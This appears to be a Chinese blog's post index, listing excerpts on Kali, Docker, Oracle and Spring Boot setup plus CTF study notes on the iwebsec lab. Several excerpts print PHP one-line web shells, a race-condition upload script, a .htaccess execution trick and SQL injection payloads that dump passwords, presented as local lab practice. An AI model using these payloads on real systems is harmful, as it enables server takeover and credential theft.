- 博客(47)
- 收藏
- 关注
原创 KaliLinux 2022.1安装和相关配置
一、安装中文输入法(一)启用root用户sudo passwd root(二)更改更新源$ vi /etc/apt/sources.list# 添加以下内容:# 中科大kali源deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib# 阿里云kali源deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib# 清华大学更
2025-01-07 09:47:48
5801
2
原创 MobaXterm tmux 配置妥当
缘由:接上篇文章,用Docker搭建pwn环境后,用之前学过的多窗口tmux进行调试程序,但是鼠标滚动的效果不按预期上下翻屏。全网搜索很难找到有效解决办法,最后还是找到了一篇英文文章,解决了,别提多开心!
2024-07-29 22:55:31
672
原创 基于Windows Docker desktop搭建pwn环境
安装虚拟机很重,占空间,影响速度。今天试了下用Windows下的Docker搭建pwn做题环境,搭配MobaXterm真的很好!
2024-07-29 12:17:25
840
原创 docker安装oracle 11g
最近把一些常用数据库都移到docker了,而且是windows下,很是方便。偶尔还是要用一下Oracle,今天就试一下安装oracle 11g 在docker上。
2024-07-08 12:00:20
908
原创 Bugku-Misc-贝斯手
用记事本打开介绍.txt会忽略后面内容,用VScode比较好。属猴,测试密码是1992,打开flag.txt内容是。5的意思是MD5,58的意思是base58。选择前32位进行md5解码。也可用脚本解Base58。
2022-07-29 10:42:36
1068
原创 《汇编语言》(王爽著)学习笔记0:16位环境dosbox安装配置
一、下载配置DOSBox(一)下载地址:https://www.dosbox.com/download.php?main=1(二)启动方法和修改配置方法开始菜单搜索D字母(三)放大界面显示(四)映射磁盘和autoexec在最后面还可加上cls命令,以清除屏幕二、开始汇编对于以上虚拟D盘上的文件可以用VsCode+X86_64assembly插件轻松编辑现在可以愉快地学习王爽老师的《汇编语言》这本书了。...
2022-04-19 09:26:11
445
原创 安全研究:Spring-Core RCE(CVE-2022-22965)Vulnerability利用和修复建议
目录一、新建SpringBoot项目二、添加修改项目文件并打包war文件(一)打开rce文件夹,修改pom.xml,将springboot版本改为2.6.5(二)新建实体类User.java(三)新建控制器类GreetingController.java(四)打包war文件三、部署到TOMCAT运行(一)下载TOMCAT(二)将项目target目录下的war包复制到webapp下并改名为ROOT.war(三)启动tomcat四、Vulnerability利用五、Spring官方修补建议六、总结环境:We
2022-04-14 18:21:41
5077
原创 Spring boot开发实践(一):创建项目、打包、上传linux服务器作为service自动启动等基本过程
一、开发工具和基本插件vscode+Extension Pack for Java+Spring Boot Extension Pack也可以用Intelij Idea,不用安装插件,本文以vscode为例二、创建项目参考网站:https://spring.io/projects/spring-boot(一)创建项目步骤1.用快捷键Ctrl+Shift+p调出命令面板,输入spring init,选择如图第三项2.按提示选择版本2.66 --> 选择jvaa --> 输入包名
2022-04-10 21:11:16
1568
原创 CTF学习笔记22:iwebsec-文件上传漏洞-07-条件竞争文件上传
一、正常上传php文件被删除你这么暴力,刚上传就删除,解决思路就是不停地上传,你要接收文件、判断文件、删除文件总要时间吧;那我见缝插针,不停地调用上传的文件,一旦成功就写入另一ma,也就是ma中ma,试一下吧,要用两个burpsuite(双开,哈哈)二、Attack步骤(一)准备父上传文件1.php并上传<?php $f=fopen("7.php","w"); fputs($f,'<?php @eval($_POST[cmd]);?>');?>该语句在测试过程中卡了很
2022-03-18 20:31:23
6355
原创 CTF学习笔记21:iwebsec-文件上传漏洞-06-文件截断上传
一、通过burpsuite改扩展名等方法不能上传二、用burpsuite配合%00上传(一)在前缀框输入:6.php%00,如果为空则上传文件保存为"_随机数字+.jpg"的图片文件(二)在filename处也加入%00.gif(三)在path段,选中%00右击,选择URL-decode,否则会将%00作为普通字符处理(四)点击forward上传成功(五)虽然提示路和文件名中包含随机数字和jpg,但实际上传的文件名仅为6.php三、测试连接测试连接成功...
2022-03-18 18:03:21
1369
原创 Oracle-创建表空间和普通用户
用到的工具:PL/SQL DeveloperOracle InstantClient一、创建表空间create tablespace orcl datafile'/opt/oracle/oradata/orcl/orcl_01.dbf' size 10000M,'/opt/oracle/oradata/orcl/orcl_02.dbf' size 10000M,'/opt/oracle/oradata/orcl/orcl_03.dbf' size 10000M,'/opt/oracle/or
2022-03-18 11:31:38
935
原创 利用yarn镜像离线安装项目npm依赖包
yarn config set yarn-offline-mirror D:\npm-packages-offlineyarn config set yarn-offline-mirror-pruning trueyarn add hexo-asset-image@0.0.3 -Syarn add hexo-autonofollow hexo-directory-category hexo-generator-feed hexo-generator-json-content he...
2022-03-14 22:26:02
6317
原创 CTF学习笔记20:iwebsec-文件上传漏洞-05-htaccess文件上传
一、通过之前的方法均不能上传php文件通过burpsuite配合改扩展名、大小写、双写等手段均不上传成功二、编写并上传.htaccess文件上传,将图片作为php解析编写.htaccess文件并上传,作用是将之后上传的同文件夹下的jpg文件作为php文件解析执行<FilesMatch "jpg">SetHandler application/x-httpd-php</FilesMatch>三、再直接上传之前同样图片文件,不改扩展名四、测试连接url地址中的地址
2022-03-11 09:10:35
4949
原创 CTF学习笔记19:iwebsec-文件上传漏洞-04-文件头过滤绕过
一、通过之前只改文件扩展名的方法不能上传二、制作图片文件copy 1.jpg/b + 1.php/a 4.jpg其中:1.jpg为任意图片文件,1.php含有一名话~,4.jpg为生成的图片ma文件内容如下:三、用burpsuite配合改扩展名上传成功文件保存路径如下四、测试连接成功...
2022-03-09 22:22:17
5685
原创 CTF学习笔记18:iwebsec-文件上传漏洞-03-Content-Type过滤绕过
一、正常情况只允许上传图片二、启动burpsuite上传gif文件,上传之前拦截打开拦截后,再提交三、连接测试
2022-02-20 21:58:33
2456
原创 Windows下多java版本共存切换
一、安装各版本jdk(安装略,装好后如图)二、设置环境变量(一)新增JAVA_HOME和CLASSPATH变量.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;(二)修改PATH变量三、新建JDK切换批处理文件#文件名:SwitchJDK.cmd,该文件自动提示以管理员身份执行@echo off>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\
2022-02-20 20:31:10
1234
原创 CTF学习笔记17:iwebsec-文件上传漏洞-02-文件名过滤绕过
一、将文件扩展名改为.phP即可上传上传路径为up/2.phP二、测试连接
2022-02-20 20:18:55
1643
原创 CTF学习笔记16:iwebsec-文件上传漏洞-01-前端JS过滤绕过
一、正常情况下无法上传php文件二、分析页面js代码三、使用“Javascript Toggle On and Off”插件,关闭javascript,上传成功php文件内容如下<?php eval($_POST['cmd']);?>说明:以上代码仅用于本地测试学习!四、测试连接五、成功获取服务器控制权...
2022-02-20 09:31:21
1131
原创 查看Oracle 服务端字符集
在脚本中通过汉字模块查询数据,结果返回为空,实际上有数据,怀疑是字符集问题一、查看服务端字符集select userenv('language') from dual二、查看本地字符集环境变量(windows cmd)echo %NLS_LANG%三、修改成一致即可查询...
2022-02-18 16:45:50
1845
原创 给 Linux oracle 11g 11.2.0.4 打补丁
目录一、查看已有补丁记录二、更新补丁工具OPatch三、升级前的测试和准备四、开始打补丁五、恢复启动数据库并升级数据字典六、检查补丁升级效果一、查看已有补丁记录select * from dba_registry_history;初始安装11g如下二、更新补丁工具OPatchunzip p6880880_112000_Linux-x86-64.ziprm -Rf /opt/oracle/product/11.2.0/db_1/OPatch/mv OPatch /opt/oracle/pro
2022-01-28 23:55:30
3496
原创 3个步骤关闭linux不必要的端口
netstat -ntl #查看开放端口lsof -i:21 #查看端口21是哪个服务chkconfig pure-ftpd off #关闭相应服务自动启动状态依此类推其他端口(截图如下)
2022-01-27 23:16:00
5547
原创 linux 禁用IPV6
vi /etc/default/grub在GRUB_CMDLINE_LINUX后加入ipv6.disable=1内容,注意留空格grub2-mkconfig -o /boot/grub2/grub.cfgreboot
2022-01-27 23:04:22
1318
原创 CentOS 7 Linux 下安装 Oracle 11g R2
一、基础准备(以root用户登录)(一)添加用户groupadd oinstallgroupadd dbauseradd -g oinstall -G dba oracle -mpasswd oracle(二)创建安装目录,并赋予用户与用户组mkdir -p /opt/oracle/product/11.2.0/db_1mkdir /opt/oracle/product/11.2.0/oradatachown -R oracle:oinstall /opt/oraclechmod -R
2022-01-27 21:40:00
1694
原创 CTF学习笔记15:iwebsec-SQL注入漏洞-13-二次注入
一、注册用户时单引号被addslashs,不能执行(一)注册前查看一下用户表假设目标是获取admin用户的密码(二)注册admin’#用户二、找回密码时注入被执行(一)页面观察准备为了更好地了解二次注入原理,修改一下reset.php源码,在页面上输出SQL语句(二)admin用户密码被找回三、其他二次注入数据观察初始数据有其他已经注入的数据,我们看下有什么作用可以看出,这是打二次注入和报错注入结合使用了。SQL注入小结自此,用周末1天半的闲暇时间完成了iwebsec
2022-01-23 21:54:36
1872
原创 CTF学习笔记13:iwebsec-SQL注入漏洞-11-十六进制绕过
一、本题难道名不符实,用第1题数字型payload直接打出结果二、原来是payload中没有单引号,实际做题过程要一步步分析,那么来看看取列名这一步会怎样(一)果然报错:(二)原因如下:(三)用users的十六制代替?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273...
2022-01-23 21:09:53
1582
原创 CTF学习笔记12:iwebsec-SQL注入漏洞-10-双重url编码绕过
一、用第8题大小写绕过一样的payload就能得到结果?id=-1 union Select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users二、进行一次urlencode编码来测试一下,也可以得到结果?id=-1%20union%20Select%201%2C2%2Cgroup_concat(concat(username%2C0x7e%2Cpassword))%20from%20iwebsec.users
2022-01-23 20:52:53
1272
原创 CTF学习笔记11:iwebsec-SQL注入漏洞-09-双写关键字绕过
一、解题过程感觉题目越来越简单,只需绕过select关键字过滤即可?id=-1 union selselectect 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users
2022-01-23 20:40:12
935
原创 CTF学习笔记10:iwebsec-SQL注入漏洞-08-大小写过滤绕过
一、解题过程将SQL关键都换成大小写交替,最后经查看源码,本题只过滤了select?id=-1 Union Select 1,2,Group_concat(concat(username,0x7e,password)) From iwebsec.users
2022-01-23 20:34:25
1017
原创 CTF学习笔记9:iwebsec-SQL注入漏洞-07-空格过滤绕过
一、直接上payload?id=-1%0aunion%a0select%0a1,2,group_concat(concat(username,0x7e,password))/**/from(iwebsec.users)二、以上用到了多种绕过空格的方法%a0%0a/**/()
2022-01-23 20:27:19
1503
原创 CTF学习笔记8:iwebsec-SQL注入漏洞-06-宽字节注入
直接上payload?id=-1%df’ union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users–+
2022-01-23 19:50:04
1052
1
原创 CTF学习笔记7:iwebsec-SQL注入漏洞-05-updatexml注入
目录一、解题过程(一)直接上payload二、源码分析(一)php源码分析(二)报错注入探究1.rand和floor函数与group by的冲突2.extractvalue()函数一、解题过程(一)直接上payload?id=1^updatexml(1,concat(0x7e,(select group_concat(password) from iwebsec.users),0x7e),3)--+说明:如果输出长度受限,需要用reverse反转再拼接?id=1^updatexml(1,conc
2022-01-23 19:43:23
1178
原创 CTF学习笔记6:iwebsec-SQL注入漏洞-04-sleep注入
目录一、解题过程(一)观察页面(二)编写脚本逐项获取数据1.获取数据库名的长度(可不做)2.获取数据库名(可不做)3.获取表名4.获取users表的列名5.获取password列的数据源码分析(一)php源码关键脚本一、解题过程(一)观察页面发现不论输入的payload正确与否,页面输出是一样的,所以不能bool注入(二)编写脚本逐项获取数据1.获取数据库名的长度(可不做)#encoding=utf-8import requestsimport osimport timeurl="ht
2022-01-22 23:23:55
699
原创 CTF学习笔记5:iwebsec-SQL注入漏洞-03-bool注入
一、解题过程(一)观察payload与结果1.SQL执行有结果,就输出welcome to iwebsec!!!2.否则输出1(二)编写脚本逐项获取信息1.获取数据库名字符串长度先要为python安装requests包pip install requestspython代码如下:#encoding=utf-8import requestsimport osurl="http://192.168.182.130:8001/sqli/03.php"def DbLen():
2022-01-22 18:47:21
1467
原创 CTF学习笔记4:iwebsec-SQL注入漏洞-02-字符型注入
一、直接上payload方法:宽字节注入?id=-1%df' union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users--+或?id=-1%df%5c%27 union select 1,2,group_concat(concat(username,0x7e,password)) from iwebsec.users--+二、源码分析(一)查看源文件addslashes()是PHP函
2022-01-22 17:43:09
1004
原创 CTF学习笔记3:mysql读文件与写文件
目录一、前提条件(一)查看导入导出权限配置(二)查看当前用户(三)查看当前用户的文件读写权限(四)为实验修改配置重启服务(五)检查配置效果二、读写文件测试(一)生成测试文件(二)读取文件(三)写入文件(四)检查写入效果一、前提条件1.对web目录具有读写权限2.知道文件绝对路径3.能够使用联合查询(一)查看导入导出权限配置mysql> show variables like "secure_file_priv";+------------------+-------+| Variabl
2022-01-22 16:38:24
1169
原创 CTF学习笔记2:iwebsec-SQL注入漏洞-01-数字型注入
提示:本篇为最简单的SQL注入入门,是在自己本地虚拟机的靶场上练习,为的是了解安全防御技术。切勿在未经授权的情况下,测试或攻击他人网站或系统,否则将承担法律责任!请学习《网络安全法》。一、解题过程用到的工具:Chrome浏览器和HackerBar插件(一)题目概览1.题目路径2.HackerBar使用3.测试结果集列数为3列?id=1 order by 44.给id传递-1再用union select查询自己想要的数据(1)取得当前应用的数据库名?id=-1 union sele
2022-01-22 15:46:50
3964
原创 ES6解构赋值
@[TOC]目录一、数组解构(一)带默认值(二)…运算符二、对象解构三、原生属性解构四、字符串解构五、函数参数解构(一)数组形式(二)对象形式(参数顺序不重要,名称重要)(三)对象形式参数带默认值...
2022-01-15 15:08:53
275
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人